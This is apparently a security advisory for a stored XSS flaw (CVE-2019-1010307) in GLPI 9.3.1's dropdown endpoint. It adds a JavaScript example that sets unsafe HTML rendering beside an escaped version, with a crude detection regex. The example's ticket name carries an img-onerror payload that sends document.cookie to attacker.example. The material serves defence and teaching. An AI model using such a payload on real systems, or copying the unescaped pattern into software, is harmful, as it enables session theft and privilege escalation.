PT-2019-11558 · Teclib · Glpi

Published 2019-07-15 · Updated 2019-07-18 · CVE-2019-1010307

CVSS v3.1: 5.4 Medium
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: Teclib GLPI version 9.3.1
Description: GLPI 9.3.1 is vulnerable to stored Cross-Site Scripting (XSS) in the /glpi/ajax/getDropDownValue.php endpoint: attacker-controlled ticket data returned by this endpoint is rendered in the browser without proper escaping. Attack scenario: a low-privileged user creates a ticket containing a JavaScript payload; later an administrator opens a different ticket and uses the "Link Tickets" feature, which queries the vulnerable endpoint to populate the ticket dropdown, so the payload is fetched and executed in the administrator's browser session. Because the script runs with the administrator's privileges, the result is privilege escalation: the attacker needs only an account able to create tickets (PR:L) and a single routine action from the victim (UI:R).
Recommendations: Upgrade to a GLPI release that contains the fix (see the Fix reference on this page). If you must remain on 9.3.1 for the time being, as a temporary workaround disable or stop using the "Link Tickets" feature, and restrict access to /glpi/ajax/getDropDownValue.php (for example by source IP at the web server) to reduce exposure. These workarounds only narrow the window for this particular trigger; they do not remove the underlying unescaped output, so treat them as a stopgap until the upgrade is complete.
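The following is an added illustration of the vulnerability class described above (stored XSS through a dropdown-values endpoint), not code from GLPI or from this advisory. The ticket records, the payload, the two rendering functions and the `containsActiveMarkup` check are all constructed here to show the unsafe pattern beside its hardened form; the actual GLPI rendering path is not reproduced.

```javascript
// Added example: stored XSS via a dropdown-values endpoint, shown as a generic
// pattern. Nothing here is GLPI's own code; records and payload are constructed.

// Constructed sample of what a ticket-list endpoint could return. Ticket 42's
// name is attacker-controlled and carries an XSS payload.
const sampleTickets = [
  { id: 41, name: "Printer on floor 2 is jammed" },
  {
    id: 42,
    name: 'Help<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">',
  },
];

// Vulnerable pattern: dropdown markup built by string concatenation. When this
// lands in the DOM, the browser parses the ticket name as HTML and the <img
// onerror> handler runs with the viewing user's (e.g. the admin's) session.
function renderOptionsUnsafe(tickets) {
  return tickets
    .map((t) => `<option value="${t.id}">${t.name}</option>`)
    .join("\n");
}

// Minimal HTML escaper covering the characters that can break out of text or
// attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every untrusted value is escaped before it enters markup.
// (In real DOM code, setting option.textContent / option.value achieves the same.)
function renderOptionsSafe(tickets) {
  return tickets
    .map((t) => `<option value="${escapeHtml(t.id)}">${escapeHtml(t.name)}</option>`)
    .join("\n");
}

// Crude reviewer check over rendered markup: does a real tag with an inline
// event handler, or a script/iframe tag, survive? Escaped text ("&lt;img")
// never starts a tag, so it is not matched.
function containsActiveMarkup(html) {
  return /<\s*\w+[^>]*\son\w+\s*=|<\s*(script|iframe)\b/i.test(html);
}

console.log("unsafe markup executes payload:", containsActiveMarkup(renderOptionsUnsafe(sampleTickets)));
console.log("safe markup executes payload:  ", containsActiveMarkup(renderOptionsSafe(sampleTickets)));
```

Run with `node`; the unsafe renderer reports `true`, the escaped one `false`. The point for review is that escaping must happen at the moment untrusted data is inserted into markup, on the rendering side, regardless of which endpoint supplied the data.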

Exploit

Fix

XSS

Related Identifiers

CVE-2019-1010307

Affected Products

Glpi